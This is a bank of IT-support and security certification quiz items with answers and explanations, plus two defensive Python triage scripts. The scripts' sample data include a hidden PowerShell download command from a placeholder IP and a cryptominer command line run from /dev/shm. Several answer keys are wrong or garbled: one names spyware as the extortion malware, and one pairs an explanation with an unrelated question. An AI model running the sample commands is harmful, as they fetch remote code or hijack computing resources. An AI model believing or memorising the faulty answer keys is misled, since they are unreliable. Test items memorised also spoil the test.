A technician is using a tool with a secure erase function that performs a zero-filling on HDDs and marks all blocks as empty on SSDs. The SSD firmware’s automatic garbage collectors then perform the actual erase of each block over time. What is this tool?

Shredding

Erasing/wiping

Low-level formatting

Standard formatting

A

Low-level formatting

A low-level formatting tool resets a disk to its factory condition. Most of these tools will incorporate some sanitize function.

The standard formatting tool deletes partitions and writes a new file system. A standard (quick) format only removes the references to files and marks all sectors as usable; the data itself remains on the disk and is recoverable.

Erasing/wiping software overwrites old data with zeroes or random patterns, leaving the disk in a "clean" state, ready to be passed to the new owner. This overwriting method is suitable for all but the most confidential data on an HDD, but it is unreliable on SSDs, where wear levelling and over-provisioned blocks mean the host cannot address every location; there, the drive's own secure erase function should be used instead.

Shredding is when the disk is ground into little pieces. A mechanical shredder works in much the same way as a paper shredder.

229
Q

A company uses a method that restricts its employees from messing with their computer settings. What is this method called?

Disable guest accounts

Expiration requirements

Secure PII and passwords

BIOS

A

BIOS

A Basic Input/Output System (BIOS) or UEFI firmware password controls access to the firmware setup utility. A supervisor (setup) password prevents the user from changing the boot order, virtualization, Secure Boot and other low-level settings, while a user (boot) password must be entered before the machine will boot at all. Pairing the supervisor password with a locked boot order stops a user booting from removable media to bypass operating-system controls.

An expiration requirement means that the user must change the password after a set period.

Securing personally identifiable information (PII) and passwords means that paper copies of personal and confidential data must not be left where they could be read or stolen, and that such information should not be entered into unprotected plain-text files, word-processing documents, or spreadsheets.

Disabling the guest account matters because an enabled guest account allows unauthorized access to the computer and may provide some network access. It is only enabled to facilitate password-less file sharing in a Windows workgroup.

230
Q

A technician helps a customer with a ticket request and needs to record that the customer has accepted that the ticket can be closed. Which of the following fields reflect this part of the ticket life cycle?

Progress notes

Escalation levels

Problem resolution

Problem description

A

Problem resolution

Problem resolution sets out the plan of action and documents the successful implementation and testing of the plan and full system functionality.

Problem description records the initial request with any detail that could easily be collected at the time.

Progress notes record which diagnostic tools and processes have been used and what they found, identifying and confirming a probable cause.

Escalation levels occur when an agent cannot resolve the ticket. The support team can be organized into tiers to clarify the escalation levels. The ticket owner is the person responsible for managing the ticket.

231
Q

An administrator uses a document list that identifies the discrete stages in the use of hardware and software. What is this document called?

Assigned users

Procurement life cycle

Warranty

Knowledge base

A

Procurement life cycle

The procurement life cycle covers the approval request procedure, determining budgets, identifying a trusted supplier or vendor for the asset, deploying the asset (installing it in a secure configuration), maintaining it, and finally disposing of it.

Warranty information is part of the asset record, along with the relevant procurement documentation.

Assigned users records that hardware assets such as workstations, laptops, smartphones, tablets, and software licenses might be assigned to individual user accounts.

Knowledge base (KB) is a repository for articles that answer frequently asked questions (FAQs) and document common or significant troubleshooting scenarios and examples. Each inventory record could be tagged with a cross-reference to an internal knowledge base to implement self-service support and assist technicians.

232
Q

Before an IT team can submit an application for change, it must include a document that includes an analysis of risks associated with performing the change and risks that might be incurred through not performing the requested change. What type of document is this?

Purpose of the change

Scope of the change

Date and time change

Affected systems

A

Purpose of the change

The purpose of the change is the business case for making the change and the accumulated benefits.

Scope of the change may include cost, timescales, and amount of devices involved. The scope should also include the factors by which the success or failure of the change can be judged.

Date and time change should be scheduled appropriately to minimize risks of system downtime or other negative impacts on the workflow of the business units that depend on the IT system being modified.

Affected systems must be considered in the implementation of a change. For the most significant changes, the organization should first test the change in a sandbox or lab environment rather than on production systems.

233
Q

A security engineer runs a long tail analysis to determine the frequency of services and processes communicating to the internet. After baselining a large amount of normal traffic such as updates, they encounter a suspicious communication frequency every five minutes from a particular box. They have done a thorough job investigating running processes, memory analysis, and file integrity checks but find nothing. What else could the engineer check for persistence mechanisms that could send the communications?

lusrmgr.msc

Privileged time

taskschd.msc

msconfig.exe

A

taskschd.msc

The Task Scheduler (taskschd.msc) runs software and scripts according to calendar or event triggers. A task configured to repeat every five minutes is a classic persistence mechanism and would explain periodic communication that cannot be tied to any process visible at the moment of inspection, because the task's process only lives for an instant each time it fires.

The Local Users and Groups (lusrmgr.msc) console provides an advanced interface for creating, modifying, disabling, and deleting user accounts.

Privileged time is used to compare against user time. If it is much higher, the central processing unit (CPU) is likely underpowered (it can barely run Windows core processes efficiently).

The System Configuration Utility (msconfig.exe) is used to modify various settings and files that affect how the computer boots and loads Windows.
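A quick way to hunt for the persistence described above is to export the scheduled tasks and score them for short repeat intervals, script interpreters, actions outside trusted directories and embedded URLs. The script below is an added example for this page, not part of the flashcard set or of any Microsoft tooling. Its sample input is a constructed CSV laid out like the output of schtasks /query /v /fo CSV, with the columns reduced to the ones the script reads (csv.DictReader ignores column order and extra columns); the task names, paths and the 198.51.100.7 address are invented.

```python
import csv
import io
import re

# Constructed sample in the layout of "schtasks /query /v /fo CSV" (columns reduced).
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type","Repeat: Every","Author"
"WS01","\Microsoft\Windows\WindowsUpdate\Scheduled Start","%windir%\system32\sc.exe start wuauserv","SYSTEM","On an event","N/A","Microsoft Corporation"
"WS01","\GoogleUpdateTaskMachineUA","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua","SYSTEM","Daily","1:00:00",""
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM","Weekly","N/A","Microsoft Corporation"
"WS01","\Updater","powershell.exe -w hidden -nop -c iwr http://198.51.100.7/b","SYSTEM","Daily","0:05:00","WS01\alice"
'''

TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def parse_interval(text: str):
    """'0:05:00' -> 300 seconds; 'N/A', 'Disabled' or anything unparsable -> None."""
    m = re.fullmatch(r"(\d+):(\d{2}):(\d{2})", text.strip())
    if not m:
        return None
    h, mi, s = (int(x) for x in m.groups())
    return h * 3600 + mi * 60 + s


def executable_of(command: str) -> str:
    """The program an action launches: a quoted path, or everything up to the first
    executable/script extension (unquoted paths with spaces are common in this output)."""
    command = command.strip().replace("%windir%", r"C:\Windows").replace("%SystemRoot%", r"C:\Windows")
    m = re.match(r'^"([^"]+)"|^(.+?\.(?:exe|com|bat|cmd|vbs|js|ps1))(?=\s|$)', command, re.I)
    if m:
        return m.group(1) or m.group(2)
    return command.split()[0] if command else ""


def hunt(csv_text: str, max_interval_s: int = 600) -> list:
    """Return tasks with at least two independent indicators of a beaconing persistence task."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = []
        interval = parse_interval(row.get("Repeat: Every", ""))
        if interval is not None and interval <= max_interval_s:
            reasons.append(f"repeats every {interval} s")
        action = row.get("Task To Run", "")
        exe_l = executable_of(action).lower()
        name = exe_l.rsplit("\\", 1)[-1]
        if name in INTERPRETERS:
            reasons.append(f"launches interpreter {name}")
        if not exe_l.startswith(TRUSTED_DIRS):
            reasons.append("action not under a trusted directory")
        if re.search(r"https?://", action, re.I):
            reasons.append("action references a URL")
        if len(reasons) >= 2:
            findings.append({"task": row["TaskName"], "run_as": row.get("Run As User", ""),
                             "interval_s": interval, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_CSV):
        print(f["task"], f["run_as"], f["interval_s"], "; ".join(f["reasons"]))
```

On a live host, export with schtasks /query /v /fo CSV > tasks.csv (open it with encoding utf-8-sig, since the tool writes a BOM) and pass the text to hunt(). Comparing the export against one taken from a known-clean build of the same image is more reliable than any scoring, because a legitimate vendor updater that repeats often will otherwise need to be allow-listed by hand.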

234
Q

A forensic investigator is told that a server’s processor that does not normally run high has been over-utilized lately, and they suspect possible malware. The investigator wants to start by investigating processes. Which command can they use to start the investigation? (Select all that apply.)

SELECT ALL THAT APPLY

top

man

ps

grep

A

top
ps

The ps command prints a snapshot of the process table, a record that summarizes the processes currently running on the system; with the -e and -o options it lists every process with chosen columns such as PID, parent PID, user, CPU share and command line.

The top command lists the processes running on a Linux system like ps, but refreshes continuously and sorts by CPU use by default. It acts as a process management tool by enabling users to prioritize, sort, or terminate processes interactively.

The grep (globally search a regular expression and print) command is used to search and filter the contents of files.

Linux users can use man to view the help pages for a particular command. For example, use man to view the help pages for the man command.
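Once ps has produced the snapshot, the investigator needs criteria for what looks wrong. The script below is an added example for this page, not part of the flashcard set; it parses constructed ps output (invented PIDs, paths and a TEST-NET address) laid out like ps -eo pid,ppid,user,pcpu,etimes,args --no-headers, and flags high CPU use, processes that dress up as kernel threads, and binaries running from world-writable scratch directories.

```python
import re
import sys

# Constructed sample in the layout of: ps -eo pid,ppid,user,pcpu,etimes,args --no-headers
SAMPLE_PS = """\
    1     0 root      0.0  86400 /sbin/init
    2     0 root      0.0  86400 [kthreadd]
   15     2 root      0.1  86400 [kworker/0:1]
  812     1 www-data  1.2   7200 nginx: worker process
 4231     1 root     97.3   5400 [kworker/u8:3]
 4310  4231 root     48.0   5300 /dev/shm/.x/xmrig -o stratum+tcp://203.0.113.5:3333
"""

SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
KTHREADD_PID = 2  # every genuine kernel thread is a child of kthreadd (PID 2)


def parse_ps(text: str) -> list:
    """Split each ps line into its six columns; args may itself contain spaces."""
    procs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, user, pcpu, etimes, args = line.split(None, 5)
        procs.append({"pid": int(pid), "ppid": int(ppid), "user": user,
                      "pcpu": float(pcpu), "etimes": int(etimes), "args": args})
    return procs


def triage(text: str, cpu_threshold: float = 50.0) -> list:
    """Return the processes worth a closer look, each with the reasons it was flagged."""
    procs = parse_ps(text)
    reasons_by_pid = {p["pid"]: [] for p in procs}
    for p in procs:
        reasons = reasons_by_pid[p["pid"]]
        if p["pcpu"] >= cpu_threshold:
            reasons.append(f"{p['pcpu']}% CPU")
        # Kernel threads print as [name] and hang off kthreadd; a process with a bracketed
        # name whose parent is anything else is a userland binary impersonating one.
        if (re.fullmatch(r"\[[^\]]+\]", p["args"]) and p["pid"] != KTHREADD_PID
                and p["ppid"] not in (0, KTHREADD_PID)):
            reasons.append(f"kernel-thread name but parent is {p['ppid']}, not kthreadd")
        if p["args"].startswith(SUSPECT_DIRS):
            reasons.append("executable under a world-writable scratch directory")
    bad = {pid for pid, r in reasons_by_pid.items() if r}
    for p in procs:  # second pass: inherit suspicion down the process tree
        if p["ppid"] in bad:
            reasons_by_pid[p["pid"]].append(f"parent {p['ppid']} is also flagged")
    return [{"pid": p["pid"], "user": p["user"], "args": p["args"], "reasons": reasons_by_pid[p["pid"]]}
            for p in procs if reasons_by_pid[p["pid"]]]


if __name__ == "__main__":
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_PS
    for f in triage(data):
        print(f["pid"], f["user"], f["args"], "->", "; ".join(f["reasons"]))
```

Pipe real output in with ps -eo pid,ppid,user,pcpu,etimes,args --no-headers | python3 triage.py. For any flagged PID, ls -l /proc/PID/exe shows the real binary path (and a "(deleted)" suffix if the file was removed after launch, a common trick), and /proc/PID/cwd shows where it was started.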

235
Q

A vulnerability management lead wants to set up the company using a more secure authentication method than a simple password. What hardware aspect should the management lead consider?

CPU requirements

Hardware token

Integrated graphics card

Dedicated graphics card

A

Hardware token

An external hardware token is a smart card or USB form factor device that stores cryptographic user identification data. The user must present the token and supply a password, PIN, or fingerprint scan to authenticate.

Central processing unit (CPU) requirements refer to the performance and features of the computer’s main processor.

A dedicated graphics card serves demanding applications, such as graphic design software or a game; it will not help the company to use a more secure authentication method.

An integrated graphics card would also not help the company to use a more secure authentication method.

236
Q

A company has hundreds of employees who use the same software on their computers, so they offer a company product key to access the software. What is this product?

Corporate-use license

DRM

Data retention requirements

Personal license

A

Corporate-use license

A corporate-use (volume) license covers multiple users, which means the company can install the software on an agreed number of computers for its employees to use simultaneously. The company receives a valid license with a product key and must ensure the license has not expired.

A personal license allows the product to be used by a single person at a time, though it might permit installation on multiple personal devices.

Data retention requirements are regulations that set a maximum period for data retention. The regulation might also demand that information be retained for a minimum period.

Digital music and video are often subject to copy protection and digital rights management (DRM).

237
Q

A vulnerability manager is brainstorming ways to enhance security for the company's phones. The company only uses Apple devices, so one idea is to look for anomalous files that do not belong on an Apple platform, a sign of malware that did not profile the device and was simply blasted out in the hope that the operating system would match. Which of the following would be anomalous?

.dmg

.app

.apk

.pkg

A

.apk

An .apk file is the package format for Android, and the vulnerability manager only has Apple devices in the environment. On Android, enabling installation from unknown sources lets untrusted apps downloaded from a website be installed from an .apk file.

DMG (disk image) format is used for simple installs where the package contents need to be copied to the Applications folder.

PKG format is used where app setup needs to perform additional actions, such as running a service or writing files to multiple folders.

The app is placed in a directory with a .APP extension in the Applications folder when it has been installed.

238
Q

A systems administrator wants to create a scheduled task throughout the environment, which does a basic health check at night when users are not working. Which command should the administrator use in their scheduled task?

format

chkdsk

xcopy

diskpart

A

chkdsk

chkdsk scans the file system and disk sectors for faults and can attempt to repair any problems detected.

The format command writes a new file system to a drive. This process deletes any data existing on the drive. This could be catastrophic if used in the wrong way.

The xcopy command is a utility that allows administrators to copy the contents of more than one directory at a time and retain the directory structure.

Diskpart is the command interface underlying the Disk Management tool. Diskpart manages disks, partitions, and volumes.

239
Q

A security awareness trainer spends a good portion of the training class talking about phishing, given its popularity as an attack vector. Phishing campaigns are getting more sophisticated, so the trainer is helping the class learn how to identify a phishing email. Which of the following is an indicator of phishing? (Select all that apply.)

SELECT ALL THAT APPLY

Disguised links

No signature

Inconsistent sender and reply-to addresses

Urgency

A

Disguised links
Inconsistent sender and reply-to addresses
Urgency

Many phishing emails have a sense of urgency so that the recipient will act now or else it will be too late. In business, this could be an email that appears to be from the boss, who needs something right away.

The email sender’s address (the FROM address) should be consistent with the REPLY-TO address.

Links in phishing emails can be disguised. For example, a link that appears to be www.microsoft.com reveals a very different URL, such as www.maliciouslink.com, when the cursor hovers over the link.

An email with no signature is not an indicator of phishing.

240
Q

A user wants to share their printer with other teams, but not all teams use the same operating system. What can the user do to configure functionality with the other teams?

Additional drivers

Proxy settings

Mapped drive

File server

A

Additional drivers

Use the Additional Drivers button to make drivers available for different client operating systems. For example, if the print server is Windows 10 64-bit, it can make 32-bit Windows 7 drivers available.

Configuring the proxy settings will not help with printer functionality. The settings for proxy information can be found in internet options.

A mapped drive is a share that has been assigned to a drive letter on a client device. To map a share as a drive, right-click it and select Map Network Drive.

A file server would not help with printer functionality, although a print server could assist with this endeavor.

241
Q

Over the day, a user’s computer becomes slow. Then pop-ups start to appear randomly. Later on, the pop-ups become more frequent, and the user notices that internet searches are using Google even though a different default search provider is configured in Firefox. Once the computer starts crashing repeatedly, the user calls for help. Considering all of these data points, what is the best diagnosis of the problem?

Adware or spyware infection

Ransomware

HOSTS file is corrupted and is mapping domain names to the wrong IP addresses.

DNS server is corrupted and is mapping domain names to the wrong IP addresses.

A

Adware or spyware infection

All of the symptoms listed in this scenario are common to adware and spyware. Another symptom is redirection, where a user tries to open one page but gets sent to another.

The goal of ransomware is extortion. Ransomware encrypts files to shut down access to data until payment is made.

A DNS server mapping domain names to the wrong IP addresses is an example of a redirection attack, where a user is redirected to a malicious site. It does not generate the other symptoms.

HOSTS is a legacy means of mapping domain names and IP addresses. If corrupted and incorrectly mapped, it is a redirection attack, and the other symptoms do not occur.

242
Q

The System Restore tool in Windows is used to roll back configuration changes to an earlier date or restore point. One option for creating restore points is to use Task Scheduler. What other actions will create a restore point? (Select all that apply.)

SELECT ALL THAT APPLY

Updating an application

Installing a program

Deleting a file

Rebooting

A

Updating an application
Installing a program

Whenever an application or program is installed, a restore point is created.

A restore point is also created whenever an application or program is updated.

Deleting a file will not create a restore point. Likewise, when using System Restore to roll back to an earlier date, the user’s documents, pictures, and other data are not deleted. However, software and drivers installed after the restore point will be uninstalled.

A restore point is not created when a computer is rebooted, but Windows will create a restore point if one has not occurred in seven days.

243
Q

An analyst uses a method that calculates a product of the likelihood and impact of the potential threat category. What is this method?

Sandbox testing

End-user acceptance

Risk levels

Rollback plan

A

Risk levels

Risk levels are included in the risk assessment and can be expressed as a discrete value or as a traffic-light-type indicator, where red is high risk, orange is moderate risk, and green is minimal risk.

Sandbox testing is a computing environment designed to replicate the production environment but isolated from it.

A rollback plan is when a change can be reversed if it has harmful or unforeseen consequences.

End-user acceptance must be accounted for when a change is implemented. It can be difficult for people to adapt to new processes and easy for them to magnify minor problems into major complaints.

244
Q

An administrator reviews a series of instructions that the workstation follows every time a user logs on. What is this called?

MDM

Group policy

Login script

Home folder

A

Login script

A login script performs configuration or process activity when the user signs in. A login script can be defined via the user profile or assigned to an account via group policy.

Group policy configures computer settings and user profile settings. A group policy can also be used to deploy software automatically.

Mobile device management (MDM) is a class of software designed to apply security policies to mobile devices in the enterprise.

A home folder is a private drive mapped to a network share to store personal files. The home folder location is configured via the account properties on the Profile tab using the Connect To box.

245
Q

A local jewelry maker sets up a booth at a craft fair. When the first customer makes a purchase, the vendor’s contactless card reader will not recognize the customer’s wallet app. Which of the following could solve the problem?

Hold the mobile device closer to the reader and wait.

Turn on airplane mode.

Use biometric authentication.

Enable RFID.

A

Hold the mobile device closer to the reader and wait.

Contactless card readers use near-field communication (NFC). NFC normally works at up to two inches (6 cm), so moving the device closer to the reader could solve the problem.

Turning on airplane mode will disconnect NFC.

Biometric authentication allows a user to perform a biometric scan to operate an entry or access a system. Typical features used include facial pattern, iris, retina, fingerprint pattern, and signature recognition.

Radio Frequency ID (RFID) is a means of identifying and tracking objects, such as parcels, equipment, or access badges, using specially encoded tags.

246
Q

A video game development company is purchasing upgraded laptops to develop cutting-edge graphics for a new story they have been marketing. They want to be able to integrate persistent system RAM. What type of operating system should they use for support?

Enterprise

Home

Pro for Workstations

Pro

A

Pro for Workstations

Windows Pro for Workstations has many of the same features as Pro but supports more maximum RAM and advanced hardware technologies, such as persistent system RAM (NVDIMM).

Windows Pro is designed for usage in small- and medium-sized businesses and can be obtained using original equipment manufacturer (OEM), retail, or volume licensing.

The Enterprise edition has several features not available in the Pro edition, such as support for Microsoft’s DirectAccess virtual private networking technology, AppLocker, and more.

The Windows Home edition is designed for domestic consumers and possibly small office home office (SOHO) business use.

247
Q

During the IT team’s weekly meeting, the topic of improving the overall cyber hygiene of the company turns into a discussion about the employees’ lack of security awareness. Why would the IT team members focus on employee behavior? (Select all that apply.)

SELECT ALL THAT APPLY

Hashing

Jailbreaking

Phishing

Social engineering

A

Phishing
Social engineering

Social engineering uses deception and trickery to convince users to provide sensitive data or violate security guidelines. People are susceptible to social engineering as part of the human condition, so training is necessary to overcome that instinct.

Phishing is when an attacker sends an email from a supposedly reputable source, such as a bank, to elicit private information from the victim. It is easy to be duped by phishing emails, so training is necessary so users can identify these scams.

Hashing is an encryption process that takes any amount of data as input and produces a fixed-length value as output.

Jailbreaking subverts the security controls built into the operating system to gain unrestricted system-level access.

248
Q

A technician is implementing a Linux shell script in which each statement comprising the actions the script will perform is typically added on a separate line. Which of the following is this?

.ps1

.sh

.vbs

.bat

A

.sh

.sh is the Linux shell script extension by convention. Every shell script starts with a shebang line designating which interpreter to use, such as Bash or Ksh. It includes a series of commands that run consecutively to carry out tasks.

.ps1 is the PowerShell script file. Microsoft provides the Windows PowerShell Integrated Scripting Environment (ISE) for rapid development.

.vbs is the VBScript file extension. VBScript predates PowerShell. The wscript.exe interpreter executes VBScript by default.

.bat is the Windows batch file extension. A shell script for the basic Windows CMD interpreter is often described as a batch file.

249
Q

A threat actor uses a technique that lets devices connect using open authentication and then redirects the user’s browser to a fake captive portal that encourages the user to enter their network password. What is this technique?

Spoofing

Insider threat

Whaling

Evil twin

A

Evil twin

An evil twin attack is like phishing, but instead of an email, the attacker uses a rogue wireless access point to try to harvest credentials.

Whaling is an attack directed specifically against levels of management in the organization. Upper management may also be more vulnerable to common phishing attacks because of their reluctance to learn basic security procedures.

An insider threat is an employee or other person with immediate access to internal components of the company or organization.

A spoofing threat is any attack where the threat actor can masquerade as a trusted user or computer.

250
Q

A Linux administrator sets up a development environment where they can install and test new packages. Which of the following commands will help the administrator accomplish this? (Select all that apply.)

SELECT ALL THAT APPLY

ip

df

yum

apt-get

A

yum
apt-get

apt-get is a command interface for the Advanced Packaging Tool (APT). APT is used by Debian distributions and works with .deb format packages.

yum is the command interface for YUM. The command yum install PackageName installs a new application.

As part of the iproute2 package, the ip command has options for managing routes and the local interface configuration. The command ip addr replicates the basic reporting functionality of ifconfig (show the current address configuration).

df (“disk free”) lets the user view the device’s free space, file system, total size, space used, percentage value, and mount point.

251
Q

What can use a trusted platform module chip in the computer to tie the use of a fixed disk to a particular motherboard?

Application security

Inheritance

Port security

BitLocker

A

BitLocker

BitLocker is a disk encryption product available with all Windows editions except for the Home edition. Full disk encryption carries a processing overhead, but modern computers usually have the processing capacity to spare. It can also be used with removable drives in its BitLocker To Go form.

Port security triggers are based on the Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP) port number used by the application protocol.

Application security triggers are based on the process that listens for connections.

With inheritance, a permission assigned to a folder is automatically inherited by the files and subfolders created under that folder.

252
Q

A helpdesk operator looks at build numbers for Windows as they plan upgrade timelines. The operator investigates the significance of the build numbers. Which of the following are the build numbers based on? (Select all that apply.)

SELECT ALL THAT APPLY

Windows version

Year

32 bit vs 64 bit

Time of year

A

Year
Time of year

The number 16 in build 1607 corresponds to the year (2016) of release.

The 07 portion of build 1607 represents the month (07/July) of release. The current version of Windows 10 at the time of writing is 21H2, released in the second half of 2021.

Versioning is not part of it. Windows 10 and Windows 11 represent the currently supported versions of the Windows client OS.

The architecture is not part of it either. Each version and edition of Windows 10 was originally available as 32-bit (x86) or 64-bit (x64) software. A 32-bit CPU can only run the 32-bit editions. A 64-bit CPU can run either.

253
Q

A user has owned the same personal computer for a while and thinks it might be time for an upgrade. Which of the following are upgrade considerations? (Select all that apply.)

SELECT ALL THAT APPLY

PXE support

Application support

Hardware compatibility

Backup files

A

Application support
Hardware compatibility
Backup files

Hardware compatibility is a consideration. The user must make sure that the central processing unit (CPU), chipset, and RAM components are sufficient to run the OS.

Application and driver support and backward compatibility are other considerations. Most version upgrades try to maintain support for applications and device drivers developed for older versions.

Backup files and user preferences are a consideration. If the user is installing a new operating system or doing a clean install, the user should back up any necessary data and settings.

Most computers now come with Preboot eXecution Environment (PXE)-compliant firmware and a network adapter that supports this boot option, so PXE support is not necessarily a consideration.

254
Q

A technician is cleaning a computer and notices dust forming over the fan blades and ventilation slots. What can the technician use to perform dust cleanup? (Select all that apply.)

SELECT ALL THAT APPLY

Domestic vacuum

Natural bristle brush

Compressed air blaster

PC vacuum cleaner

A

Natural bristle brush
Compressed air blaster
PC vacuum cleaner

A compressed air blaster can be used to dislodge dust from difficult-to-reach areas. When performing this sort of maintenance within a controlled area, wear an appropriate air-filter mask and goggles.

A PC vacuum cleaner can both blow air and provide suction, replacing the need for a compressed air canister. Such vacuums should be labeled as toner safe.

Natural bristle brushes remove dust from inside the system unit, especially from the motherboard, adapter cards, and fan assemblies.

Domestic vacuum appliances should not be used as they can produce high levels of static electricity.

255
Q

An IT specialist removes malware from a computer system and then re-enables System Restore. Then a new restore point is created, all security-critical services and settings are validated, and the DNS configuration is verified. However, when the specialist runs a final antivirus scan, it detects malware. Considering all the steps taken, which would explain why there was still malware on the system?

C&C network connection was detected.

DNS spoofing was detected.

Port forwarding was detected.

Cross-site scripting was detected.

A

C&C network connection was detected.

The IT specialist did not inspect the firewall configuration and therefore failed to find the changes that allowed a command and control (C&C) network to establish a connection.

Domain Name System (DNS) spoofing is when an attacker directs a victim away from a legitimate site and towards a fake site.

Port forwarding is the process in which a router takes requests from the internet for a particular application and sends them to a designated host on the LAN.

Cross-site scripting (XSS) is when a malicious script is hosted on the attacker’s site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser’s security model of trusted zones.

256
Q

Many mobile apps collect location data. Rogue apps could use location data for criminal purposes, such as burglary. However, many legitimate apps also track a mobile user’s location. Why would a legitimate app have interest in a user’s location?

Clicks

Geotagging

Targeted advertising

Redirection

A

Targeted advertising

Legitimate apps are interested in tracking a user’s location for targeted advertising. For example, Facebook tracks the location of its users for that very reason, although it is facing scrutiny over privacy issues.

Geotagging is adding geographic data and location to photos. An app would not track a user’s location to tag their pictures.

Redirection is a malware attack, where the malware corrupts the Domain Name System (DNS) and search provider to force users to spoofed sites.

The pursuit of clicks typically is the area of interest for adware since developers are paid when users click on the advertisements.

257
Q

A user implements a technique that requires a 4- or 6-digit input to gain access to their device. What is this technique?

Pattern

Facial recognition

Swipe

PIN

A

PIN

Personal identification numbers (PINs) are used on most devices to enable screen lock authentication and generate an encryption key. The PIN can act as a primary or backup authentication method.

Swipe is a gesture that leaves access to the device unauthenticated. Simply swiping across the screen will unlock the device.

Pattern requires the user to swipe a “join-the-dots” pattern. The pattern method has numerous weaknesses.

Facial recognition is a method that creates a template computed from a 3-D image of the user’s face. A facial bio gesture has the advantage of using the camera rather than a special sensor.

258
Q

A user calls the help desk with issues consistent with a malware infection, although the user received no alert. The technician confirms that there was no malware alert. Which of the following options would be an appropriate next step? (Select all that apply.)

SELECT ALL THAT APPLY

Log on to the system as an administrator.

Scan the system using different antivirus software.

Remove the malware.

Update the antivirus software.

A

Scan the system using different antivirus software.
Update the antivirus software.

Since the installed antivirus software did not pick up the malware infection, scanning the system with a different antivirus product is a good option since some products pick up what others do not.

The antivirus software may not have detected the malware infection because it was not updated. Updating antivirus software before running scans is a best practice.

Logging on to a malware-infected system as an administrator exposes the administrator’s privileged credentials for the malware to exploit.

Removing the malware is a few steps ahead of the current scenario.

259
Q

A user downloaded a script, but the file was in a text file format. The user needs to change the extension to a PowerShell script to run it, but they do not see the extension. Where can the user configure this setting?

Internet Options

Ease of Access

File Explorer General tab

File Explorer View tab

A

File Explorer View tab

On the File Explorer View tab, among many other options, users can show or hide file extensions, hidden files, and protected operating system files.

On the File Explorer General tab, users can set options for the layout of Explorer windows and switch between the single-click and double-click styles of opening shortcuts.

Ease of Access settings configures input and output options to best suit each user. There are three main settings groups.

The Internet Options Control Panel applet exposes the configuration settings for Microsoft’s Internet Explorer (IE) browser. The Security tab restricts what types of potentially risky active content are allowed to run.

260
Q

A user finds that their iPhone 5 starts to run slowly, and a reboot does not solve the slow performance. Which of the following issues could be causing the problem? (Select all that apply.)

SELECT ALL THAT APPLY

Low battery charge

OS update

Too many apps open

Mesh network

A

Low battery charge
OS update
Too many apps open

If a battery is almost out of charge, it could cause slowness, as will a faulty battery or other faulty hardware.

If too many apps are open, a phone could become slow because the open apps are consuming most of the phone’s resources.

An operating system (OS) update on an older phone can severely impact performance.

A mesh network provides communication between devices or nodes using some type of mesh networking, such as Z-Wave or Zigbee, which uses less power and makes it easier for smart devices to forward data between nodes.

261
Q

What is also known as a potentially unwanted application (PUA) and should be removed from the computer?

Potentially Unwanted Application (PUA)

Operating System Update

Antivirus Software

Productivity Tools

A

Potentially Unwanted Application (PUA)

An untrusted source is one where an installer cannot be verified through a digital signature or is known to be a security risk, and it is likely to expose the user to unwanted adverts. Some untrusted sources do not block ads or have pop-up blockers.

As the browser is a security-critical type of software, it is particularly important to use a trusted source, such as an app store. Likewise, if installed as a desktop application, the user should ensure it comes from a reputable vendor.

Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.

A secure connection validates the host’s identity running a site and encrypts communications to protect against snooping.

262
Q

A software development team is unaware of a developing vulnerability in the system. What is this type of vulnerability?

EOL

Impersonation

BYOD

Zero-day attack

A

Zero-day attack

A zero-day attack is a vulnerability exploited before the developer knows about it or can release a patch. These can be extremely destructive, as it can take the vendor a lot of time to develop a patch, leaving systems vulnerable for days, weeks, or even years.

End of life (EOL) system is where the software vendor no longer provides support or fixes problems.

Bring your own device (BYOD) is a provisioning model that allows employees to use personal mobile devices to access corporate systems and data.

Impersonation means that the social engineer develops a pretext scenario to interact with an employee.

263
Q

A server administrator migrates their environment from physical servers to a virtualized environment. The administrator wants to install new virtual machine operating systems. What is the best approach to use regarding deploying virtualized OSs?

ISOs

Physical media

Proxy

Downloadable

A

ISOs

ISO files stored on removable media or a host system are often used to install virtual machine operating systems. A mountable ISO is often used to install complex apps, such as databases, where there are many separate components and large file sizes to install.

An ISO file could be distributed on physical media, such as CD/DVD or a USB thumb drive, but is typically distributed through file sharing on an enterprise network.

An ISO can be downloaded, although the administrator should check to ensure that the file hash matches the official hash.

While the administrator is probably routing through a proxy at their company, most proxies have a file size limit above which they do not scan the file.

264
Q

Which of the following malware tries to extort money from the victim?

Trojan

Spyware

Boot sector virus

Ransomware

A

Spyware

Spyware is malware that can perform browser reconfigurations, such as allowing tracking cookies, changing default search providers, opening arbitrary pages at startup, adding bookmarks, and many more.

Viruses are concealed within the code of an executable process image stored as a file on a disk.

Trojans are malware concealed within an installer package for software that appears to be legitimate. The malware will be installed alongside the program and executed with the same privileges.

Boot sector viruses can infect the boot sector code or partition table on a disk drive.

265
Q

Which of the following backup procedures states that users should have three copies of their data across two media types, with one copy held off-line and off-site?

Frequency

GFS

Synthetic

3-2-1 backup rule

A

3-2-1 backup rule

3-2-1 backup rule is a best-practice maxim that users can apply to their backup procedures to verify that they are implementing a solution to mitigate the widest possible range of disaster scenarios.

Grandfather-father-son (GFS) is a backup rotation scheme that uses son tapes, which store the most recent data and have the shortest retention period. Grandfather tapes are the oldest and have the longest retention period.

Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.

The synthetic full backup is not generated directly from the original data but instead assembled from other backup jobs.

266
Q

A manager for a Linux server team recently purchased new software which will help to streamline operations, but they are worried that in IT, there is a high turnover of personnel. The manager wants to ensure they can obtain updates, monitor and fix security issues, and are provided technical assistance. What impact is the manager trying to mitigate?

Training

Network

Licensing

Support

A

Support

